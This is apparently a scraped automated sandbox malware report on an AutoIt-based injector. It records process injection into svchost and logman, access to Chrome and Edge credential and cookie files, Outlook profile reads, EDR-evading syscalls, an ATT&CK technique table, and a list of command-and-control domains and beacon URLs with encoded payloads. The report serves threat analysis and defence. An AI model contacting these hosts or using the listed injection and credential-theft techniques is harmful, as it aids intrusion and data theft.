                Source: C:\Windows\SysWOW64\logman.exeSection loaded: NULL target: C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\logman.exeSection loaded: NULL target: C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\logman.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\logman.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\logman.exeThread register set: target process: 3292Jump to behavior
                Source: C:\Windows\SysWOW64\logman.exeThread APC queued: target process: C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exeJump to behavior
                Source: C:\Users\user\Desktop\NWPZbNcRxL.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2EF0008Jump to behavior
                Source: C:\Users\user\Desktop\NWPZbNcRxL.exeCode function: 0_2_00C687B1 LogonUserW,0_2_00C687B1
                Source: C:\Users\user\Desktop\NWPZbNcRxL.exeCode function: 0_2_00C13B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00C13B3A
                Source: C:\Users\user\Desktop\NWPZbNcRxL.exeCode function: 0_2_00C148D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00C148D7
                Source: C:\Users\user\Desktop\NWPZbNcRxL.exeCode function: 0_2_00C74C53 mouse_event,0_2_00C74C53
                Source: C:\Users\user\Desktop\NWPZbNcRxL.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\NWPZbNcRxL.exe"Jump to behavior
                Source: C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exeProcess created: C:\Windows\SysWOW64\logman.exe "C:\Windows\SysWOW64\logman.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\logman.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\NWPZbNcRxL.exeCode function: 0_2_00C67CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00C67CAF
                Source: C:\Users\user\Desktop\NWPZbNcRxL.exeCode function: 0_2_00C6874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_00C6874B
                Source: NWPZbNcRxL.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                Source: WnOFOMnqmLQAP.exe, 00000004.00000000.2338332946.0000000001AC1000.00000002.00000001.00040000.00000000.sdmp, WnOFOMnqmLQAP.exe, 00000004.00000002.4504263364.0000000001AC1000.00000002.00000001.00040000.00000000.sdmp, WnOFOMnqmLQAP.exe, 00000007.00000000.2484345214.0000000001701000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
                Source: NWPZbNcRxL.exe, WnOFOMnqmLQAP.exe, 00000004.00000000.2338332946.0000000001AC1000.00000002.00000001.00040000.00000000.sdmp, WnOFOMnqmLQAP.exe, 00000004.00000002.4504263364.0000000001AC1000.00000002.00000001.00040000.00000000.sdmp, WnOFOMnqmLQAP.exe, 00000007.00000000.2484345214.0000000001701000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: WnOFOMnqmLQAP.exe, 00000004.00000000.2338332946.0000000001AC1000.00000002.00000001.00040000.00000000.sdmp, WnOFOMnqmLQAP.exe, 00000004.00000002.4504263364.0000000001AC1000.00000002.00000001.00040000.00000000.sdmp, WnOFOMnqmLQAP.exe, 00000007.00000000.2484345214.0000000001701000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: WnOFOMnqmLQAP.exe, 00000004.00000000.2338332946.0000000001AC1000.00000002.00000001.00040000.00000000.sdmp, WnOFOMnqmLQAP.exe, 00000004.00000002.4504263364.0000000001AC1000.00000002.00000001.00040000.00000000.sdmp, WnOFOMnqmLQAP.exe, 00000007.00000000.2484345214.0000000001701000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\NWPZbNcRxL.exeCode function: 0_2_00C3862B cpuid 0_2_00C3862B
                Source: C:\Users\user\Desktop\NWPZbNcRxL.exeCode function: 0_2_00C44E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00C44E87
                Source: C:\Users\user\Desktop\NWPZbNcRxL.exeCode function: 0_2_00C51E06 GetUserNameW,0_2_00C51E06
                Source: C:\Users\user\Desktop\NWPZbNcRxL.exeCode function: 0_2_00C43F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_00C43F3A
                Source: C:\Users\user\Desktop\NWPZbNcRxL.exeCode function: 0_2_00C149A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00C149A0

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000005.00000002.4504489847.0000000002D20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.4506381463.0000000005550000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.4503536884.0000000002730000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.4503787893.0000000002B00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2417007133.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2417341861.0000000003800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.4504631608.0000000004530000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2417817350.0000000005400000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\SysWOW64\logman.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\logman.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\logman.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\SysWOW64\logman.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\logman.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\logman.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\logman.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\logman.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\logman.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
                Source: NWPZbNcRxL.exeBinary or memory string: WIN_81
                Source: NWPZbNcRxL.exeBinary or memory string: WIN_XP
                Source: NWPZbNcRxL.exeBinary or memory string: WIN_XPe
                Source: NWPZbNcRxL.exeBinary or memory string: WIN_VISTA
                Source: NWPZbNcRxL.exeBinary or memory string: WIN_7
                Source: NWPZbNcRxL.exeBinary or memory string: WIN_8
                Source: NWPZbNcRxL.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000005.00000002.4504489847.0000000002D20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.4506381463.0000000005550000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.4503536884.0000000002730000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.4503787893.0000000002B00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2417007133.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2417341861.0000000003800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.4504631608.0000000004530000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2417817350.0000000005400000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\NWPZbNcRxL.exeCode function: 0_2_00C86283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,0_2_00C86283
                Source: C:\Users\user\Desktop\NWPZbNcRxL.exeCode function: 0_2_00C86747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00C86747
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire Infrastructure2
                Valid Accounts
                2
                Native API
                1
                DLL Side-Loading
                1
                Exploitation for Privilege Escalation
                1
                Disable or Modify Tools
                1
                OS Credential Dumping
                2
                System Time Discovery
                Remote Services1
                Archive Collected Data
                4
                Ingress Tool Transfer
                Exfiltration Over Other Network Medium1
                System Shutdown/Reboot
                CredentialsDomainsDefault Accounts2
                Command and Scripting Interpreter
                2
                Valid Accounts
                1
                Abuse Elevation Control Mechanism
                1
                Deobfuscate/Decode Files or Information
                21
                Input Capture
                1
                Account Discovery
                Remote Desktop Protocol1
                Data from Local System
                1
                Encrypted Channel
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                DLL Side-Loading
                1
                Abuse Elevation Control Mechanism
                Security Account Manager2
                File and Directory Discovery
                SMB/Windows Admin Shares1
                Email Collection
                4
                Non-Application Layer Protocol
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
                Valid Accounts
                3
                Obfuscated Files or Information
                NTDS116
                System Information Discovery
                Distributed Component Object Model21
                Input Capture
                4
                Application Layer Protocol
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
                Access Token Manipulation
                1
                DLL Side-Loading
                LSA Secrets151
                Security Software Discovery
                SSH3
                Clipboard Data
                Fallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts412
                Process Injection
                2
                Valid Accounts
                Cached Domain Credentials2
                Virtualization/Sandbox Evasion
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
                Virtualization/Sandbox Evasion
                DCSync3
                Process Discovery
                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
                Access Token Manipulation
                Proc Filesystem11
                Application Window Discovery
                Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt412
                Process Injection
                /etc/passwd and /etc/shadow1
                System Owner/User Discovery
                Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1587671 Sample: NWPZbNcRxL.exe Startdate: 10/01/2025 Architecture: WINDOWS Score: 100 28 www.fersigorta.xyz 2->28 30 zcdn.8383dns.com 2->30 32 19 other IPs or domains 2->32 42 Suricata IDS alerts for network traffic 2->42 44 Antivirus detection for URL or domain 2->44 46 Multi AV Scanner detection for submitted file 2->46 50 4 other signatures 2->50 10 NWPZbNcRxL.exe 4 2->10         started        signatures3 48 Performs DNS queries to domains with low reputation 28->48 process4 signatures5 62 Binary is likely a compiled AutoIt script file 10->62 64 Writes to foreign memory regions 10->64 66 Maps a DLL or memory area into another process 10->66 68 Switches to a custom stack to bypass stack traces 10->68 13 svchost.exe 10->13         started        process6 signatures7 70 Maps a DLL or memory area into another process 13->70 16 WnOFOMnqmLQAP.exe 13->16 injected process8 signatures9 40 Found direct / indirect Syscall (likely to bypass EDR) 16->40 19 logman.exe 13 16->19         started        process10 signatures11 52 Tries to steal Mail credentials (via file / registry access) 19->52 54 Tries to harvest and steal browser information (history, passwords, etc) 19->54 56 Modifies the context of a thread in another process (thread injection) 19->56 58 3 other signatures 19->58 22 WnOFOMnqmLQAP.exe 19->22 injected 26 firefox.exe 19->26         started        process12 dnsIp13 34 www.f5jh81t3k1w8.sbs 154.213.39.66, 49904, 80 POWERLINE-AS-APPOWERLINEDATACENTERHK Seychelles 22->34 36 www.lmueller.dev 46.38.243.234, 49977, 49978, 49979 NETCUP-ASnetcupGmbHDE Germany 22->36 38 10 other IPs or domains 22->38 60 Found direct / indirect Syscall (likely to bypass EDR) 22->60 signatures14

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                NWPZbNcRxL.exe71%ReversingLabsWin32.Trojan.AutoitInject
                NWPZbNcRxL.exe46%VirustotalBrowse
                NWPZbNcRxL.exe100%Joe Sandbox ML
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                SourceDetectionScannerLabelLink
                http://www.deacapalla.online/__media__/design/underconstructionnotice.php?d=deacapalla.online0%Avira URL Cloudsafe
                http://www.deacapalla.online/0pui/?V8=8E9ba00UjFo7PU/eEqgVWkIK94OcHqokbV3+SylgnD70KIDAP1aAQbV/7FCow/l5youCP7Vx0oTyvxMws++GcEtPIIait+3tzbwSXdRUlhYH624U7nSdIoyPDL7sOl16Zw==&Bb6h7=gBiPvnrHa0%Avira URL Cloudsafe
                http://www.100millionjobs.africa/tw42/?V8=lppBzHasG2q3W2gwBEigKs+lYs+CAuXKSLpv0GvBrwIC17Gf2xLaVk86ThwJgseC0DRvoxJH/zAsXU58KuU4W+pKTj7Ns/0A3sApM0dQZei9OXaCVa2j9SlaFImncTaD0Q==&Bb6h7=gBiPvnrHa0%Avira URL Cloudsafe
                http://www.lmueller.dev/z8lg/0%Avira URL Cloudsafe
                https://www.axis138ae.shop/j2vs/?Bb6h7=gBiPvnrHa&V8=ojS/2P5nrhKWG869xfViz2uaiQ4dB6fmN9sQwMDG5q6PFmCk0%Avira URL Cloudsafe
                http://www.x3kwqc5tye4vl90y.top/iuei/?Bb6h7=gBiPvnrHa&V8=ueDaiuOcYsSp9Xkcl1oB9tm+tEnnENLgHwvKheTa7AKLOQ8fO2SBLqueUKoOI6xeDW+RE21fFYk3KnUadQilvOUj3f5vRoUOjIAyrnG2dTWXtM1xYmeCqswVLQjzw0rbHw==0%Avira URL Cloudsafe
                http://www.marketyemen.holdings/8efo/?V8=T2NGoo7Qxcyqrqz3MX03hpQWSivm/Bj7gd/lPuHNqm/993Y45l+K5XkRQc/91P+Wf5o+Fy5PkbYLO4eQBkWEWabH/6z+kfBygbxby0fAgVFPJA+Djx5wnWVAkFd+F7WzDg==&Bb6h7=gBiPvnrHa0%Avira URL Cloudsafe
                http://www.odvfr.info/rl5p/0%Avira URL Cloudsafe
                http://www.100millionjobs.africa/tw42/0%Avira URL Cloudsafe
                http://www.odvfr.info/rl5p/?Bb6h7=gBiPvnrHa&V8=U5nb6F2D+6Ub+BbGgn/WBcZABtiKGjnTMliNxQrWrtMhCM2XjoMK5ippUQtHm0xX3cajxvPhwbFvkKUzAaSZHL5crW9oCCkqzTfN0RC5pEjEcoIvYgKfrFT9zkKgJZ+CcA==0%Avira URL Cloudsafe
                http://www.valuault.store/nhb9/0%Avira URL Cloudsafe
                http://www.fersigorta.xyz/2a2y/0%Avira URL Cloudsafe
                http://www.vh5g.sbs/rjsl/0%Avira URL Cloudsafe
                http://www.al-madinatraders.shop0%Avira URL Cloudsafe
                http://digi-searches.com/Cousins.cfm?fp=SH9lOsbS1OVVggbnC4fmwz%2BlNko4bYQgT%2BmWHKPwGfkclEDw5zYuSFnX0%Avira URL Cloudsafe
                http://www.al-madinatraders.shop/qfbg/?V8=FozauU3I+LP/9Nj8g7b6dv8gCpZwHtVW5jJ9IM/S40uIbg9HP9G2UPrJfaUkURrP7SWnfEhe84Vk8Ui0+mXxkZIdFJ1enIwMA3s4LYaZdtjwXCRSGeLNYZPp7qU7y2jovw==&Bb6h7=gBiPvnrHa0%Avira URL Cloudsafe
                http://digi-searches.com/Pieces.cfm?fp=SH9lOsbS1OVVggbnC4fmwz%2BlNko4bYQgT%2BmWHKPwGfkclEDw5zYuSFnX60%Avira URL Cloudsafe
                http://www.lmueller.dev/z8lg/?V8=d+u13dJhHOFzWIGSYGA26K0asZwGQ+354a/EjoVDUhr6ByY3LBq4B/TBSd/j0JaEFkEgokttXRJz3Nwxbwya2xH8ETEZDRfZixXgz51iFTfhRHR1qQVQUph6fdb1/VOV9g==&Bb6h7=gBiPvnrHa0%Avira URL Cloudsafe
                http://digi-searches.com/Lucinda.cfm?fp=SH9lOsbS1OVVggbnC4fmwz%2BlNko4bYQgT%2BmWHKPwGfkclEDw5zYuSFnX0%Avira URL Cloudsafe
                http://www.marketyemen.holdings/8efo/0%Avira URL Cloudsafe
                http://www.x3kwqc5tye4vl90y.top/iuei/0%Avira URL Cloudsafe
                http://www.al-madinatraders.shop/qfbg/0%Avira URL Cloudsafe
                http://www.deacapalla.online/0pui/0%Avira URL Cloudsafe
                http://www.vh5g.sbs/rjsl/?Bb6h7=gBiPvnrHa&V8=sx0gCczAFgj7YDMYbB9bVpPFqR0YAiUYulJ6hk/85bzVk72pU9tIUNjCR8r6jdWIfUnKZpAIPKdoUazogFVKlOHV8iazh43WTNlrbye2V7vv7YwuIZQBC8MvvBeXOotBVw==0%Avira URL Cloudsafe
                http://www.valuault.store/nhb9/?V8=TPU4dumIi+D1nx6dGJD9W6GSZGJOmofRCRQtffc6GrD6UQOtZPepFdRZleg/11G771jgytlZx/KAXkWBKMhiKuCHTM0VrIEGohPTLQH2eOGOmwQk+g1Zd36VNj9HTWnDYA==&Bb6h7=gBiPvnrHa0%Avira URL Cloudsafe
                http://www.Deacapalla.online0%Avira URL Cloudsafe
                http://www.deacapalla.online/__media__/js/trademark.php?d=deacapalla.online&type=ns0%Avira URL Cloudsafe
                http://www.axis138ae.shop/j2vs/0%Avira URL Cloudsafe
                http://digi-searches.com/September.cfm?fp=SH9lOsbS1OVVggbnC4fmwz%2BlNko4bYQgT%2BmWHKPwGfkclEDw5zYuSF0%Avira URL Cloudsafe
                http://www.fersigorta.xyz/2a2y/?V8=zr0t7ULZxVzE+inLl39bbZB0JWpZLO1MICTJQG7tLn2thDr4Npa0BGL0Ak9UxK4o8AAox0GxcOxKU7Jm8nxF3e2PjP20+tvZNqonqnl/jekGCshc02lZKK7JWM700euXhA==&Bb6h7=gBiPvnrHa0%Avira URL Cloudsafe
                http://digi-searches.com/Ambrosia.cfm?fp=SH9lOsbS1OVVggbnC4fmwz%2BlNko4bYQgT%2BmWHKPwGfkclEDw5zYuSFn0%Avira URL Cloudsafe
                http://www.f5jh81t3k1w8.sbs/blfv/?Bb6h7=gBiPvnrHa&V8=OYzX9ZD8JFvHop8tcVV8HuyU67NFgrHF6vfAGJLgGhZlSUdZ/OYKAWfRY9pPenrbZbnckt/3jffsXR68PKDW9Ecs4jeXW699fOhXXOdveN0uJ+M8ggMhXVa/XAWEfUcQVw==100%Avira URL Cloudmalware
                http://www.axis138ae.shop/j2vs/?Bb6h7=gBiPvnrHa&V8=ojS/2P5nrhKWG869xfViz2uaiQ4dB6fmN9sQwMDG5q6PFmCkgI7u5WRyoS939Z0WQWWR6oSqfY2a6i6yoynlWLywOB6FnF6t61mCd33fp8fgqeNJIahdroNOItErrJD4XA==0%Avira URL Cloudsafe
                http://www.vh5g.sbs/0%Avira URL Cloudsafe
                http://maximumgroup.co.za/tw42/?V8=lppBzHasG2q3W2gwBEigKs0%Avira URL Cloudsafe
                NameIPActiveMaliciousAntivirus DetectionReputation
                www.deacapalla.online
                208.91.197.27
                truetrue
                  unknown
                  www.lmueller.dev
                  46.38.243.234
                  truetrue
                    unknown
                    www.valuault.store
                    209.74.79.42
                    truetrue
                      unknown
                      www.axis138ae.shop
                      104.21.48.1
                      truetrue
                        unknown
                        www.vh5g.sbs
                        188.114.97.3
                        truetrue
                          unknown
                          www.marketyemen.holdings
                          199.59.243.228
                          truetrue
                            unknown
                            100millionjobs.africa
                            136.243.64.147
                            truetrue
                              unknown
                              www.odvfr.info
                              47.254.140.255
                              truetrue
                                unknown
                                natroredirect.natrocdn.com
                                85.159.66.93
                                truefalse
                                  high
                                  zcdn.8383dns.com
                                  134.122.133.80
                                  truetrue
                                    unknown
                                    www.f5jh81t3k1w8.sbs
                                    154.213.39.66
                                    truetrue
                                      unknown
                                      al-madinatraders.shop
                                      93.127.192.201
                                      truetrue
                                        unknown
                                        www.valdevez.net
                                        unknown
                                        unknownfalse
                                          unknown
                                          www.elettrocoltura.info
                                          unknown
                                          unknownfalse
                                            unknown
                                            www.al-madinatraders.shop
                                            unknown
                                            unknownfalse
                                              unknown
                                              www.fersigorta.xyz
                                              unknown
                                              unknowntrue
                                                unknown
                                                www.reynamart.store
                                                unknown
                                                unknownfalse
                                                  unknown
                                                  www.100millionjobs.africa
                                                  unknown
                                                  unknownfalse
                                                    unknown
                                                    www.envisionmedia.shop
                                                    unknown
                                                    unknownfalse
                                                      unknown
                                                      www.x3kwqc5tye4vl90y.top
                                                      unknown
                                                      unknownfalse
                                                        unknown
                                                        NameMaliciousAntivirus DetectionReputation
                                                        http://www.lmueller.dev/z8lg/true
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.deacapalla.online/0pui/?V8=8E9ba00UjFo7PU/eEqgVWkIK94OcHqokbV3+SylgnD70KIDAP1aAQbV/7FCow/l5youCP7Vx0oTyvxMws++GcEtPIIait+3tzbwSXdRUlhYH624U7nSdIoyPDL7sOl16Zw==&Bb6h7=gBiPvnrHatrue
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.marketyemen.holdings/8efo/?V8=T2NGoo7Qxcyqrqz3MX03hpQWSivm/Bj7gd/lPuHNqm/993Y45l+K5XkRQc/91P+Wf5o+Fy5PkbYLO4eQBkWEWabH/6z+kfBygbxby0fAgVFPJA+Djx5wnWVAkFd+F7WzDg==&Bb6h7=gBiPvnrHatrue
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.odvfr.info/rl5p/true
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.odvfr.info/rl5p/?Bb6h7=gBiPvnrHa&V8=U5nb6F2D+6Ub+BbGgn/WBcZABtiKGjnTMliNxQrWrtMhCM2XjoMK5ippUQtHm0xX3cajxvPhwbFvkKUzAaSZHL5crW9oCCkqzTfN0RC5pEjEcoIvYgKfrFT9zkKgJZ+CcA==true
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.100millionjobs.africa/tw42/?V8=lppBzHasG2q3W2gwBEigKs+lYs+CAuXKSLpv0GvBrwIC17Gf2xLaVk86ThwJgseC0DRvoxJH/zAsXU58KuU4W+pKTj7Ns/0A3sApM0dQZei9OXaCVa2j9SlaFImncTaD0Q==&Bb6h7=gBiPvnrHatrue
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.x3kwqc5tye4vl90y.top/iuei/?Bb6h7=gBiPvnrHa&V8=ueDaiuOcYsSp9Xkcl1oB9tm+tEnnENLgHwvKheTa7AKLOQ8fO2SBLqueUKoOI6xeDW+RE21fFYk3KnUadQilvOUj3f5vRoUOjIAyrnG2dTWXtM1xYmeCqswVLQjzw0rbHw==true
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.100millionjobs.africa/tw42/true
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.valuault.store/nhb9/true
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.fersigorta.xyz/2a2y/true
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.vh5g.sbs/rjsl/true
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.marketyemen.holdings/8efo/true
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.lmueller.dev/z8lg/?V8=d+u13dJhHOFzWIGSYGA26K0asZwGQ+354a/EjoVDUhr6ByY3LBq4B/TBSd/j0JaEFkEgokttXRJz3Nwxbwya2xH8ETEZDRfZixXgz51iFTfhRHR1qQVQUph6fdb1/VOV9g==&Bb6h7=gBiPvnrHatrue
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.al-madinatraders.shop/qfbg/?V8=FozauU3I+LP/9Nj8g7b6dv8gCpZwHtVW5jJ9IM/S40uIbg9HP9G2UPrJfaUkURrP7SWnfEhe84Vk8Ui0+mXxkZIdFJ1enIwMA3s4LYaZdtjwXCRSGeLNYZPp7qU7y2jovw==&Bb6h7=gBiPvnrHatrue
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.x3kwqc5tye4vl90y.top/iuei/true
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.al-madinatraders.shop/qfbg/true
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.deacapalla.online/0pui/true
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.vh5g.sbs/rjsl/?Bb6h7=gBiPvnrHa&V8=sx0gCczAFgj7YDMYbB9bVpPFqR0YAiUYulJ6hk/85bzVk72pU9tIUNjCR8r6jdWIfUnKZpAIPKdoUazogFVKlOHV8iazh43WTNlrbye2V7vv7YwuIZQBC8MvvBeXOotBVw==true
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.valuault.store/nhb9/?V8=TPU4dumIi+D1nx6dGJD9W6GSZGJOmofRCRQtffc6GrD6UQOtZPepFdRZleg/11G771jgytlZx/KAXkWBKMhiKuCHTM0VrIEGohPTLQH2eOGOmwQk+g1Zd36VNj9HTWnDYA==&Bb6h7=gBiPvnrHatrue
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.axis138ae.shop/j2vs/true
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.fersigorta.xyz/2a2y/?V8=zr0t7ULZxVzE+inLl39bbZB0JWpZLO1MICTJQG7tLn2thDr4Npa0BGL0Ak9UxK4o8AAox0GxcOxKU7Jm8nxF3e2PjP20+tvZNqonqnl/jekGCshc02lZKK7JWM700euXhA==&Bb6h7=gBiPvnrHatrue
                                                        • Avira URL Cloud: safe
                                                        unknown
